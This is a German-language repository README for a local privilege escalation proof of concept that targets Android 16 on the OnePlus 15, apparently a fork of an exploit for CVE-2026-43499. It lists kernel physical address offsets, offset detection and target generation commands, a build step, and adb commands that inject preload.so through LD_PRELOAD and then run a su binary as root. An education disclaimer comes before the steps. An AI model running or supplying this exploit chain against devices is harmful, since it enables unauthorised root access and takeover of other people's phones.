
Lehrreicher Proof-of-Concept für lokale Privilege Escalation unter Android 16 auf OnePlus 15, mit Kernel-Offset-Erkennung, Zielgenerierung und LD_PRELOAD-basiertem Exploit-Build.
WARNUNG: Dieses Repository wird nur für Bildungs- und Forschungszwecke bereitgestellt. Es werden keine vorgefertigten Binärdateien oder Releases verteilt. Sie müssen alles aus dem Quellcode erstellen.
Android 16 lokale Privilegienausweitung für OnePlus 15.
Fork von x-spy/CVE-2026-43499-popsicle mit einem kallsyms-Ausrichtungsfix und einem verifizierten OnePlus-15-Profil.
Das Profil enthält zwei physische Adressen, die von einem gerooteten Gerät mit derselben Firmware bestätigt werden müssen:
{
"p0_phys_offset": "0x80000000",
"p0_kernel_phys_load": "0xc7800000"
}
Auto-Erkennung mit einem gerooteten Gerät:
python3 detect_offset.py
Erfordert Python 3 und llvm-objdump:
python3 generate_target.py \
--boot boot.img \
--profile profile_oneplus15.json \
-o source/src/target.h
make -C source clean preload
Falls NDK nicht automatisch erkannt wird:
NDK_ROOT=/path/to/android-ndk make -C source clean preload
Ausgabe: source/build/bin/preload.so
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell chmod 0644 /data/local/tmp/preload.so
adb shell LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true
adb shell /data/local/tmp/su -c id